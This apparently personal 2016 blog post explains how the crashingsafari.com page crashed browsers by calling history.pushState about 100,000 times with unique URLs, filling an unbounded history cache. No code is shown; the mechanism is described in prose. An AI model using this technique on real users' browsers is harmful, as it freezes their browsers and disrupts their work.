Last week I wrote about crashing browsers with favicons that are infinitely large. This week I found out about a website called crashingsafari.com while browsing facebook. It made the news by crashing safari in a different and hilarious way. The code is simple, and in practice it works on all browsers.
That's it! If you check out what calling the history.pushState method does, you'll see it takes three arguments. First is a state object (anything you want). Next is a title which firefox currently ignores. Finally is a URL. In this case, the payload just uses a unique string each time.
So what actually happens? The crashingsafari.com page gets cached into your browser history 100 thousand times. That's a big problem since this cache apparently has no upper limit in size. The page quickly becomes unresponsive, impossible to close, and rapidly allocating more memory. It's also pretty neat since you can see the URL bar fill up with numbers each time pushState is called.
I wonder what else in browsers doesn't have an upper limit. There are probably a lot more bugs like these out there.
ejj, Jan 2016